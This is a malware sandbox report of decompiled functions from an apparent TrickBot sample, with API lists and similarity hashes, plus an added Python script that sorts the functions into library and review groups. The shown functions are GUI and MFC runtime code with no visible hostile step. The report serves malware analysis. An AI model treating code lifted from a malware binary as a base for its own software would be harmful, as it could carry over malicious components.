                          								 *(_t38 + 0x24) =  *(_t38 + 0x24) | 0x00000040;
                          								L18:
                          								_t30 =  *(_t45 + 0x90);
                          								if(_t30 ==  *((intOrPtr*)(_t45 + 0x94))) {
                          									L21:
                          									return _t30;
                          								}
                          								_t30 = E0041884D(_t46, GetParent( *(_t45 + 0x1c)));
                          								if(_t30 == 0) {
                          									goto L21;
                          								}
                          								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
                          							}
                          						}
                          					}
                          					 *(_t45 + 0x24) =  *(_t45 + 0x24) & 0xffffffbf;
                          					if( *((intOrPtr*)(_t38 + 0x50)) != 0) {
                          						 *(_t45 + 0x90) = 0xe002;
                          					} else {
                          						 *(_t45 + 0x90) = 0xe001;
                          					}
                          					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0x90), 0);
                          					_t35 =  *((intOrPtr*)( *_t45 + 0xd4))();
                          					if(_t35 != 0) {
                          						UpdateWindow( *(_t35 + 0x1c));
                          					}
                          					goto L18;
                          				}
                          				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
                          				if(_t30 != 0) {
                          					goto L21;
                          				}
                          				goto L2;
                          			}












                          0x0042e22c
                          0x0042e22e
                          0x0042e233
                          0x0042e236
                          0x0042e23b
                          0x0042e23d
                          0x0042e253
                          0x0042e25a
                          0x0042e2ad
                          0x0042e2f2
                          0x00000000
                          0x0042e2b7
                          0x0042e2bd
                          0x0042e2e4
                          0x00000000
                          0x00000000
                          0x0042e2e6
                          0x00000000
                          0x0042e2c7
                          0x0042e2d0
                          0x0042e2d6
                          0x0042e2d6
                          0x0042e2f9
                          0x0042e2f9
                          0x0042e2fd
                          0x0042e2fd
                          0x0042e309
                          0x0042e334
                          0x0042e334
                          0x0042e334
                          0x0042e315
                          0x0042e31c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0042e32a
                          0x0042e2bd
                          0x0042e2ad
                          0x0042e25c
                          0x0042e264
                          0x0042e272
                          0x0042e266
                          0x0042e266
                          0x0042e266
                          0x0042e28c
                          0x0042e296
                          0x0042e29e
                          0x0042e2a3
                          0x0042e2a3
                          0x00000000
                          0x0042e29e
                          0x0042e248
                          0x0042e24d
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 0042E28C
                          • UpdateWindow.USER32(?), ref: 0042E2A3
                          • GetParent.USER32(?), ref: 0042E30E
                          • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 0042E32A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Message$ParentPostSendUpdateWindow
                          • String ID: @
                          • API String ID: 4141989945-2766056989
                          • Opcode ID: 026d1a49b3b74bc12d7a726dc7d4ff865367001d19cd3f2edc97a7a7140d0056
                          • Instruction ID: 84df0b17e537a4fee327fd4ea2838260a3a3e6ca4d0f6bfb0a5965ea62d3eb95
                          • Opcode Fuzzy Hash: 026d1a49b3b74bc12d7a726dc7d4ff865367001d19cd3f2edc97a7a7140d0056
                          • Instruction Fuzzy Hash: 1C31A732700710DFDB304F26E809BA677A9BF45311F50496EE55B562E1C7B998409B28
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E00419472(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                          				struct _WNDCLASSA _v44;
                          				void* __ebp;
                          				void* _t25;
                          				intOrPtr _t37;
                          				struct HINSTANCE__* _t40;
                          				CHAR* _t42;
                          
                          				_t42 = E00432335() + 0x58;
                          				_t25 = E00432562();
                          				_t37 = _a8;
                          				_t40 =  *(_t25 + 8);
                          				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
                          					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
                          				} else {
                          					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
                          				}
                          				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
                          					_v44.style = _a4;
                          					_v44.lpfnWndProc = DefWindowProcA;
                          					_v44.cbWndExtra = 0;
                          					_v44.cbClsExtra = 0;
                          					_v44.lpszMenuName = 0;
                          					_v44.hIcon = _a16;
                          					_t39 = _a12;
                          					_push( &_v44);
                          					_v44.hInstance = _t40;
                          					_v44.hCursor = _t37;
                          					_v44.hbrBackground = _a12;
                          					_v44.lpszClassName = _t42;
                          					if(E004193D1() == 0) {
                          						E00421855(_t39);
                          					}
                          				}
                          				return _t42;
                          			}









                          0x00419482
                          0x00419485
                          0x0041948a
                          0x0041948d
                          0x00419492
                          0x004194c4
                          0x0041949e
                          0x004194a8
                          0x004194ae
                          0x004194db
                          0x004194e3
                          0x004194eb
                          0x004194f0
                          0x004194f3
                          0x004194f6
                          0x004194f9
                          0x004194fc
                          0x00419502
                          0x00419503
                          0x00419506
                          0x00419509
                          0x0041950c
                          0x00419516
                          0x00419518
                          0x00419518
                          0x00419516
                          0x00419523

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: wsprintf$ClassInfo
                          • String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
                          • API String ID: 845911565-79760390
                          • Opcode ID: 498860d913ed8ffdabd7c25154fd2171b7b2e186e8da2bf643e1d5db791e0582
                          • Instruction ID: a9929ff29f41f64b48bd27a5967130d3b11607c2636f791f8f05cb3f3b4f515f
                          • Opcode Fuzzy Hash: 498860d913ed8ffdabd7c25154fd2171b7b2e186e8da2bf643e1d5db791e0582
                          • Instruction Fuzzy Hash: 74213E7190020AAF8F11DF99DD809EF7BB8FF58354F00402AF905E2200D7789E51CBA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004172E4(void* __ecx, void* __eflags, struct HWND__** _a4) {
                          				void* _t10;
                          				void* _t11;
                          				struct HWND__* _t13;
                          				struct HWND__* _t16;
                          				struct HWND__** _t23;
                          				void* _t24;
                          
                          				_t23 = _a4;
                          				_t24 = __ecx;
                          				if(E00419115(__ecx, _t23) != 0) {
                          					L12:
                          					_t10 = 1;
                          					return _t10;
                          				}
                          				_t11 = E00419EDA(__ecx);
                          				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
                          					if(_t23[1] != 0x100) {
                          						L13:
                          						return E0041AFF4(_t23);
                          					}
                          					_t13 = _t23[2];
                          					if(_t13 == 0x1b || _t13 == 3) {
                          						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || E00422608( *_t23, ?str?) == 0) {
                          							goto L13;
                          						} else {
                          							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
                          							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
                          								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
                          								goto L12;
                          							} else {
                          								goto L13;
                          							}
                          						}
                          					} else {
                          						goto L13;
                          					}
                          				} else {
                          					return 0;
                          				}
                          			}









                          0x004172e6
                          0x004172ea
                          0x004172f4
                          0x0041736b
                          0x0041736d
                          0x00000000
                          0x0041736d
                          0x004172f8
                          0x004172ff
                          0x00417312
                          0x00417370
                          0x00000000
                          0x00417373
                          0x00417314
                          0x0041731a
                          0x0041732d
                          0x00000000
                          0x0041733f
                          0x00417344
                          0x0041734c
                          0x00417365
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0041734c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00417307
                          0x00000000
                          0x00417307

                          APIs
                          • GetWindowLongA.USER32(?,000000F0), ref: 00417325
                          • GetDlgItem.USER32(?,00000002), ref: 00417344
                          • IsWindowEnabled.USER32(00000000), ref: 0041734F
                          • SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00417365
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Window$EnabledItemLongMessageSend
                          • String ID: Edit
                          • API String ID: 3499652902-554135844
                          • Opcode ID: 2e97bd6a298735bd052a9eba0b3ddb870d06f98e164f70851eb92861cabac885
                          • Instruction ID: 286ddf120a1f1e937f7bb08519e7a9a55c421e14a63c3d15613720783f553d7a
                          • Opcode Fuzzy Hash: 2e97bd6a298735bd052a9eba0b3ddb870d06f98e164f70851eb92861cabac885
                          • Instruction Fuzzy Hash: 0701C035348205BAEB311B258C4ABEBA3B4AB00751F14452BFD22D12E1CBA8DCD1E51C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00421438(void* __ecx, intOrPtr _a4) {
                          				struct HINSTANCE__* _t4;
                          				_Unknown_base(*)()* _t5;
                          				void* _t9;
                          				void* _t10;
                          
                          				_t10 = __ecx;
                          				_t4 = GetModuleHandleA("GDI32.DLL");
                          				_t9 = 0;
                          				_t5 = GetProcAddress(_t4, "SetLayout");
                          				if(_t5 == 0) {
                          					if(_a4 != 0) {
                          						_t9 = 0xffffffff;
                          						SetLastError(0x78);
                          					}
                          				} else {
                          					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
                          				}
                          				return _t9;
                          			}







                          0x0042143a
                          0x00421441
                          0x0042144d
                          0x0042144f
                          0x00421457
                          0x0042146a
                          0x0042146e
                          0x00421471
                          0x00421471
                          0x00421459
                          0x00421462
                          0x00421462
                          0x0042147b

                          APIs
                          • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,00429D47,00000000), ref: 00421441
                          • GetProcAddress.KERNEL32(00000000,SetLayout,?,?,00429D47,00000000), ref: 0042144F
                          • SetLastError.KERNEL32(00000078,?,?,00429D47,00000000), ref: 00421471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AddressErrorHandleLastModuleProc
                          • String ID: GDI32.DLL$SetLayout
                          • API String ID: 4275029093-2147214759
                          • Opcode ID: b06dd9651575d921d81a9f50bf498ea56dcb781289048d11a83ad6aaf08a996c
                          • Instruction ID: 80d238ecbf5e6c208c8ba6125b74836563e3af87c037aec0b6a4138e775a06ea
                          • Opcode Fuzzy Hash: b06dd9651575d921d81a9f50bf498ea56dcb781289048d11a83ad6aaf08a996c
                          • Instruction Fuzzy Hash: 76E0D8333001106F82606B56AC0D92BBB52DBD8721F59DA3BF679D11E0CBB84C428E69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00421402(signed int __ecx) {
                          				_Unknown_base(*)()* _t3;
                          				signed int _t7;
                          				signed int _t8;
                          
                          				_t7 = __ecx;
                          				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                          				if(_t3 == 0) {
                          					_t8 = _t7 | 0xffffffff;
                          					SetLastError(0x78);
                          				} else {
                          					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                          				}
                          				return _t8;
                          			}






                          0x00421403
                          0x00421416
                          0x0042141e
                          0x0042142b
                          0x0042142e
                          0x00421420
                          0x00421425
                          0x00421425
                          0x00421437

                          APIs
                          • GetModuleHandleA.KERNEL32(GDI32.DLL,?,00429D3A), ref: 0042140A
                          • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 00421416
                          • SetLastError.KERNEL32(00000078), ref: 0042142E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AddressErrorHandleLastModuleProc
                          • String ID: GDI32.DLL$GetLayout
                          • API String ID: 4275029093-2396518106
                          • Opcode ID: 7e88a80ef0d530e7520ed6d9e410f5b791acb66a8abef4ef68857315e5571575
                          • Instruction ID: dbc387a5ede6bf86417f8611c33ad3f829814c0e893832b321db5ad764ba88ce
                          • Opcode Fuzzy Hash: 7e88a80ef0d530e7520ed6d9e410f5b791acb66a8abef4ef68857315e5571575
                          • Instruction Fuzzy Hash: 97D05B317415306BC7602BA4BD0D7977758DB0C761759667ABD2AE21E0CFD88C4047D8
                          Uniqueness

                          Uniqueness Score: -1.00%
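The three entries above (E00419472, E00421438, E00421402) carry markers that are consistent with statically linked MFC runtime code rather than TrickBot's own logic: the "Afx:%x:%x" class-name format is what MFC's AfxRegisterWndClass builds, and the GetModuleHandleA("GDI32.DLL") / GetProcAddress("GetLayout"|"SetLayout") / SetLastError(0x78, ERROR_CALL_NOT_IMPLEMENTED) pattern matches CDC::GetLayout and CDC::SetLayout. With several hundred decompiled functions in a report like this one, an analyst wants to drop such library boilerplate first and group the rest by the report's own "API String ID" field. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses the per-function metadata blocks (APIs, String ID, API String ID, Instruction Fuzzy Hash) and sorts functions into "library" and "review" buckets. The marker list is an assumption of this example, seeded only from strings visible in the entries above, and the sample input is a constructed excerpt of those entries.

```python
"""Triage helper for Joe Sandbox 'C-Code' function entries (added example)."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Assumption of this example: strings that MFC runtime helpers emit.
# Seeded from the entries visible in the report; extend per sample.
MFC_STRING_MARKERS = ("Afx:%x:%x", "GetLayout", "SetLayout")


@dataclass
class FuncEntry:
    name: str                       # e.g. E00419472
    apis: list = field(default_factory=list)   # ["USER32!SendMessageA", ...]
    string_id: str = ""             # '$'-separated strings referenced
    api_string_id: str = ""         # "<api hash>-<string hash>"
    fuzzy_hash: str = ""            # Instruction Fuzzy Hash

    @property
    def api_id(self) -> str:
        # Left half of "4275029093-2147214759" is the API-set hash
        return self.api_string_id.split("-")[0]

    def is_runtime_boilerplate(self) -> bool:
        # Any MFC marker in the referenced strings => library code
        return any(m in self.string_id for m in MFC_STRING_MARKERS)


HEADER_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(", re.M)
API_RE = re.compile(r"^\s*•\s*([A-Za-z0-9_]+)\.([A-Z0-9]+)\(", re.M)
FIELD_RE = re.compile(
    r"^\s*•\s*(String ID|API String ID|Instruction Fuzzy Hash):\s*(.*?)\s*$", re.M)


def parse_entries(text: str) -> list:
    """Split the report on 'C-Code - Quality' headers; one chunk per function."""
    entries = []
    for chunk in re.split(r"C-Code - Quality: \d+%", text)[1:]:
        m = HEADER_RE.search(chunk)       # first match is the function header
        if not m:
            continue
        entry = FuncEntry(name=m.group(1))
        entry.apis = [f"{mod}!{fn}" for fn, mod in API_RE.findall(chunk)]
        for key, val in FIELD_RE.findall(chunk):
            if key == "String ID":
                entry.string_id = val
            elif key == "API String ID":
                entry.api_string_id = val
            else:
                entry.fuzzy_hash = val
        entries.append(entry)
    return entries


def triage(text: str) -> dict:
    """Return {'library': [...], 'review': [...]} by function name."""
    library, review = [], []
    for e in parse_entries(text):
        (library if e.is_runtime_boilerplate() else review).append(e.name)
    return {"library": library, "review": review}


def group_by_api_id(text: str) -> dict:
    """Functions sharing the same API-set hash (same imports, likely same origin)."""
    groups = defaultdict(list)
    for e in parse_entries(text):
        groups[e.api_id].append(e.name)
    return dict(groups)


# Constructed excerpt mirroring the report entries above (not the full report).
SAMPLE_REPORT = """\
C-Code - Quality: 94%
            E00419472(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
            }
APIs
Similarity
• API ID: wsprintf$ClassInfo
• String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
• API String ID: 845911565-79760390
• Instruction Fuzzy Hash: 74213E7190020AAF8F11DF99DD809EF7BB8FF58354F00402AF905E2200D7789E51CBA9
C-Code - Quality: 100%
            E004172E4(void* __ecx, void* __eflags, struct HWND__** _a4) {
            }
APIs
• GetWindowLongA.USER32(?,000000F0), ref: 00417325
• GetDlgItem.USER32(?,00000002), ref: 00417344
• IsWindowEnabled.USER32(00000000), ref: 0041734F
• SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00417365
Similarity
• String ID: Edit
• API String ID: 3499652902-554135844
C-Code - Quality: 68%
            E00421438(void* __ecx, intOrPtr _a4) {
            }
APIs
• GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,00429D47,00000000), ref: 00421441
• GetProcAddress.KERNEL32(00000000,SetLayout,?,?,00429D47,00000000), ref: 0042144F
• SetLastError.KERNEL32(00000078,?,?,00429D47,00000000), ref: 00421471
Similarity
• String ID: GDI32.DLL$SetLayout
• API String ID: 4275029093-2147214759
C-Code - Quality: 68%
            E00421402(signed int __ecx) {
            }
APIs
• GetModuleHandleA.KERNEL32(GDI32.DLL,?,00429D3A), ref: 0042140A
• GetProcAddress.KERNEL32(00000000,GetLayout), ref: 00421416
• SetLastError.KERNEL32(00000078), ref: 0042142E
Similarity
• String ID: GDI32.DLL$GetLayout
• API String ID: 4275029093-2396518106
"""

if __name__ == "__main__":
    print(triage(SAMPLE_REPORT))
    print(group_by_api_id(SAMPLE_REPORT))
```

Run against a saved copy of the full report text, the "review" bucket is the set of functions that still need a human look; the API-ID groups are a cheap way to spot siblings of a function once one member has been identified (here E00421438 and E00421402 share API hash 4275029093, as the report's own Similarity fields already indicate).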

                          C-Code - Quality: 35%
                          			E00429D0F(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				char _v20;
                          				intOrPtr _v24;
                          				long _v28;
                          				struct tagRECT _v44;
                          				struct tagRECT _v60;
                          				intOrPtr _t150;
                          				intOrPtr* _t155;
                          				intOrPtr _t161;
                          				void* _t162;
                          				signed int _t165;
                          				signed int _t167;
                          				signed int _t171;
                          				signed int _t173;
                          				long _t191;
                          				intOrPtr* _t198;
                          				intOrPtr* _t200;
                          				long _t202;
                          				intOrPtr* _t209;
                          				intOrPtr* _t211;
                          				intOrPtr* _t214;
                          				long _t216;
                          				void* _t219;
                          				signed char _t222;
                          				intOrPtr _t225;
                          				intOrPtr _t236;
                          				intOrPtr _t242;
                          				char* _t248;
                          				struct tagRECT* _t263;
                          				intOrPtr* _t279;
                          				signed int _t281;
                          				long _t283;
                          				void* _t287;
                          				intOrPtr _t291;
                          				intOrPtr _t308;
                          
                          				_t219 = __ecx;
                          				 *((intOrPtr*)(__ecx + 0x88)) = 1;
                          				E0042A5EE(__ecx);
                          				_t279 = __ecx + 0x84;
                          				if((E00421402( *((intOrPtr*)(__ecx + 0x84))) & 0x00000001) != 0) {
                          					E00421438( *_t279, 0);
                          				}
                          				_t150 =  *((intOrPtr*)(_t219 + 0x68));
                          				_t222 =  *(_t150 + 0x64);
                          				if((_t222 & 0x00000004) == 0) {
                          					if((_t222 & 0x00000002) == 0) {
                          						GetWindowRect( *(_t150 + 0x1c),  &_v44);
                          						_t281 =  *(_t219 + 0x78) & 0x0000a000;
                          						 *((intOrPtr*)(_t219 + 4)) = _a4;
                          						asm("sbb edx, edx");
                          						 *((intOrPtr*)(_t219 + 8)) = _a8;
                          						_t248 =  &_v20;
                          						_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))(_t248, 0xffffffff, ( ~_t281 & 0x00000006) + 0xa);
                          						_t225 =  *_t155;
                          						_v8 =  *((intOrPtr*)(_t155 + 4));
                          						if(_t281 == 0) {
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							_t283 = _v44.left;
                          							asm("cdq");
                          							_v20 = _t225 + _t283;
                          							_v28 = _t283;
                          							_t250 = _v44.right - _t283 - _t248 >> 1;
                          							_t161 = _a8 - (_v44.right - _t283 - _t248 >> 1);
                          							_v24 = _t161;
                          							_v16 = _v8 + _t161;
                          						} else {
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							asm("movsd");
                          							_t291 = _v44.top;
                          							_v24 = _t291;
                          							asm("cdq");
                          							_t250 = _v44.bottom - _t291 - _t248 >> 1;
                          							_t191 = _a4 - (_v44.bottom - _t291 - _t248 >> 1);
                          							_v28 = _t191;
                          							_v20 = _t225 + _t191;
                          							_v16 = _v8 + _t291;
                          						}
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t162 = _t219 + 0x48;
                          						_push(0);
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_t287 = 0xc40000;
                          						_push(0xc40000);
                          					} else {
                          						GetWindowRect( *(_t150 + 0x1c),  &_v60);
                          						 *((intOrPtr*)(_t219 + 4)) = _a4;
                          						 *((intOrPtr*)(_t219 + 8)) = _a8;
                          						_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0xa);
                          						_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0x10);
                          						_t236 = _v60.top;
                          						_v44.top = _t236;
                          						_v44.bottom =  *((intOrPtr*)(_t198 + 4)) + _t236;
                          						_v16 =  *((intOrPtr*)(_t200 + 4));
                          						_t202 = _v60.left;
                          						_v44.right =  *_t198 + _t202;
                          						_v44.left = _t202;
                          						_t250 =  *_t200 + _t202;
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						asm("movsd");
                          						_v44.left = _t202;
                          						_v44.right =  *_t200 + _t202;
                          						_v44.top = _t236;
                          						_v44.bottom = _v16 + _t236;
                          						asm("movsd");
                          						asm("movsd");
                          0x00429ed4						asm("movsd");
                          0x00429ed5						asm("movsd");
                          0x00000000						goto L6;
                          0x00429ed9					}
                          0x00429d56				} else {
                          0x00429d5d					GetWindowRect( *(_t150 + 0x1c),  &_v60);
                          0x00429d69					 *((intOrPtr*)(_t219 + 4)) = _a4;
                          0x00429d6f					 *((intOrPtr*)(_t219 + 8)) = _a8;
                          0x00429d7c					_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0xa);
                          0x00429d94					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0x10);
                          0x00429d9e					_v12 =  *_t211;
                          0x00429daa					_v8 =  *((intOrPtr*)(_t211 + 4));
                          0x00429db2					_t214 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 6);
                          0x00429dba					_t242 = _v60.top;
                          0x00429dbf					_v44.top = _t242;
                          0x00429dc5					_v44.bottom =  *((intOrPtr*)(_t209 + 4)) + _t242;
                          0x00429dc8					_v16 =  *((intOrPtr*)(_t214 + 4));
                          0x00429dcb					_t216 = _v60.left;
                          0x00429dd3					_v44.right =  *_t209 + _t216;
                          0x00429dd9					_v44.left = _t216;
                          0x00429ddc					_t250 =  *_t214 + _t216;
                          0x00429dde					asm("movsd");
                          0x00429ddf					asm("movsd");
                          0x00429de0					asm("movsd");
                          0x00429de1					asm("movsd");
                          0x00429dea					_v44.left = _t216;
                          0x00429ded					_v44.right = _v12 + _t216;
                          0x00429df5					_v44.top = _t242;
                          0x00429df8					_v44.bottom = _v8 + _t242;
                          0x00429dfe					asm("movsd");
                          0x00429dff					asm("movsd");
                          0x00429e00					asm("movsd");
                          0x00429e01					asm("movsd");
                          0x00429e08					_t308 = _v16 + _t242;
                          0x00429e0a					_v44.left = _t216;
                          0x00429e0d					_v8 = _t308;
                          0x00429e10					_v44.bottom = _t308;
                          0x00429e16					_v44.right = _t250;
                          0x00429e19					_v44.top = _t242;
                          0x00429e1c					asm("movsd");
                          0x00429e1d					asm("movsd");
                          0x00429e1e					asm("movsd");
                          0x00429e1f					asm("movsd");
                          0x00429e20					_v44.left = _t216;
                          0x00429e26					_v44.right = _t250;
                          0x00429e29					_v44.top = _t242;
                          0x00429e2c					_v44.bottom = _v8;
                          0x00429edc					L6:
                          0x00429edc					asm("movsd");
                          0x00429edd					asm("movsd");
                          0x00429ede					asm("movsd");
                          0x00429edf					asm("movsd");
                          0x00429ee0					_t287 = 0xc40000;
                          0x00429ee5					_push(0);
                          0x00429ee7					_push(0xc40000);
                          0x00429ee8					_t162 = _t219 + 0x48;
                          0x00429ee8				}
                          0x00429fce				_push(_t162);
                          0x00429fcf				E004301F7();
                          0x00429fd4				_push(0);
                          0x00429fd6				_t263 = _t219 + 0x58;
                          0x00429fd9				_push(_t287);
                          0x00429fda				_push(_t263);
                          0x00429fdb				E004301F7();
                          0x00429fe0				_t165 =  *0x44b30c; // 0x2
                          0x00429fee				_t167 =  *0x44b308; // 0x2
                          0x00429ffa				InflateRect(_t219 + 0x48,  ~_t167,  ~_t165);
                          0x00429ffc				_t171 =  *0x44b30c; // 0x2
                          0x0042a004				_t173 =  *0x44b308; // 0x2
                          0x0042a00d				InflateRect(_t263,  ~_t173,  ~_t171);
                          0x0042a00f				_t264 = _a8;
                          0x0042a012				_t289 = _a4;
                          0x0042a01b				E00429C4E(_t219 + 0x28, _a4, _a8);
                          0x0042a026				E00429C4E(_t219 + 0x38, _a4, _a8);
                          0x0042a031				E00429C4E(_t219 + 0x48, _t289, _t264);
                          0x0042a03c				E00429C4E(_t219 + 0x58, _t289, _t264);
                          0x0042a04c				 *((intOrPtr*)(_t219 + 0x74)) = E0042A860();
                          0x0042a04f				E0042A062(_t219, _t289, _t264);
                          0x0042a05f				return E0042A9BF(_t219, _t250);
                                    			}

                          Instruction addresses for the preceding statements of this function, one per line of code in source order:
                          0x00429d16 0x00429d1a 0x00429d24 0x00429d2f 0x00429d3c 0x00429d42 0x00429d42 0x00429d47 0x00429d4a 0x00429d50
                          0x00429e3d 0x00429ef7 0x00429f03 0x00429f0e 0x00429f16 0x00429f18 0x00429f24 0x00429f2a 0x00429f30 0x00429f37
                          0x00429f3a 0x00429f7b 0x00429f7c 0x00429f80 0x00429f81 0x00429f82 0x00429f8c 0x00429f8f 0x00429f9a 0x00429f9d
                          0x00429f9f 0x00429fa6 0x00429fa9 0x00429f3c 0x00429f42 0x00429f43 0x00429f47 0x00429f48 0x00429f49 0x00429f51
                          0x00429f54 0x00429f5c 0x00429f5e 0x00429f60 0x00429f68 0x00429f70 0x00429f70 0x00429fac 0x00429fad 0x00429fae
                          0x00429faf 0x00429fb0 0x00429fb8 0x00429fba 0x00429fbb 0x00429fbc 0x00429fbd 0x00429fc4 0x00429fc5 0x00429fc6
                          0x00429fc7 0x00429fc8 0x00429fcd 0x00429e43 0x00429e4a 0x00429e56 0x00429e5c 0x00429e69 0x00429e81 0x00429e89
                          0x00429e8e 0x00429e94 0x00429e97 0x00429e9a 0x00429ea2 0x00429ea8 0x00429eab 0x00429ead 0x00429eae 0x00429eaf
                          0x00429eb0 0x00429eb7 0x00429eb8 0x00429eb9 0x00429eba 0x00429ebb 0x00429ec9 0x00429ecc 0x00429ecf 0x00429ed2
                          0x00429ed3

                          APIs
